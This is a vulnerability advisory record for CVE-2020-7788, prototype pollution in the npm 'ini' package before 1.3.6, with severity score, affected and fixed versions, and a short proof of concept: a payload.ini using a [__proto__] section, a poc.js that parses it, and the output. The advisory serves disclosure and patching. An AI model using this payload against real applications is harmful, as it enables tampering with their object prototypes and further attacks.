GHSA-qqgx-2p2h-9c37

Source

https://github.com/advisories/GHSA-qqgx-2p2h-9c37

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/12/GHSA-qqgx-2p2h-9c37/GHSA-qqgx-2p2h-9c37.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-qqgx-2p2h-9c37

Aliases

CVE-2020-7788
SNYK-JS-INI-1048974

Published

2020-12-10T16:53:45Z

Modified

2023-11-01T05:16:54.094773Z

Severity

7.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L CVSS Calculator

Summary

ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse

Details

Overview

The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini

[__proto__]
polluted = "polluted"

poc.js:

var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)

> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted

References

Affected packages

npm / ini

Package

Name: ini; View open source insights on deps.dev
Purl: pkg:npm/ini

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.3.6